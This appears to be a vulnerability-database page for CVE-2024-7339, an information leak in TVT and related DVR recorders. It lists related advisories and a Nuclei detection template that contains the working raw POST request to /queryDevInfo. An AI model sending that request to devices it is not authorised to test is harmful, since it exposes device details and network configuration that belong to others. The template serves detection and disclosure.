| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| The vulnerability of the software for hybrid HD video recorders TD-2104TS-CL, TD-2108TS-HP, TD-2116TE-HP, AV108T, SH-4050A5-5L(MM), and SH-8100A-2L(MM) lies in the lack of protection for operational data, allowing attackers to disclose the protected information. | 19 Aug 202400:00 | – | bdu_fstec | |
| Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Provision-Isr Sh-4050A5-5L\(Mm\)_Firmware | 5 Aug 202416:26 | – | githubexploit | |
| CVE-2024-7339 | 1 Aug 202407:03 | – | circl | |
| TVT DVR TD-2104TS-CL 和 TD-2108TS-HP 信息泄露漏洞 | 1 Aug 202400:00 | – | cnnvd | |
| CVE-2024-7339 | 1 Aug 202404:00 | – | cve | |
| CVE-2024-7339 TVT DVR TD-2104TS-CL queryDevInfo information disclosure | 1 Aug 202404:00 | – | cvelist | |
| CVE-2024-7339 | 1 Aug 202404:15 | – | nvd | |
| CVE-2024-7339 | 1 Aug 202404:15 | – | osv | |
| PT-2024-5614 · Provision Isr +2 · Sh-8100A-2L +5 | 1 Aug 202400:00 | – | ptsecurity | |
| CVE-2024-7339 | 23 May 202509:50 | – | redhatcve |
id: CVE-2024-7339
info:
name: TVT DVR Sensitive Device - Information Disclosure
author: Stuxctf
severity: medium
description: |
A vulnerability has been found in TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T and classified as problematic. This vulnerability affects unknown code of the file /queryDevInfo. The manipulation leads to information disclosure.
impact: |
An attacker get detailed device information including hardware and software versions, serial numbers, and network configuration.
remediation: |
Implement strict access controls and authentication mechanisms to manage access to the device interfaces.
reference:
- https://netsecfish.notion.site/Sensitive-Device-Information-Disclosure-in-TVT-DVR-fad1cce703d946969be5130bf3aaac0d
- https://netsecfish.notion.site/Sensitive-Device-Information-Disclosure-in-TVT-DVR-fad1cce703d946969be5130bf3aaac0d?pvs=4
- https://vuldb.com/?ctiid.273262
- https://vuldb.com/?id.273262
- https://vuldb.com/?submit.379373
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-7339
cwe-id: CWE-200
epss-score: 0.32028
epss-percentile: 0.98096
metadata:
verified: true
max-request: 1
tags: cve,cve2024,dvr,tvt,info-leak,vkev,vuln
http:
- raw:
- |
POST /queryDevInfo HTTP/1.1
Host: {{Hostname}}
<?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>
matchers-condition: and
matchers:
- type: word
words:
- "softwareVersion"
- "eth0"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402206991ad38c0b9a4296cc4c6d8c65d82e5adb02e1367528b303b0e9e76d9fd502f02203e03e94d87d16c273d0ef29e926bb65d0d8d6bfe019a540f79683dec52f436d0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation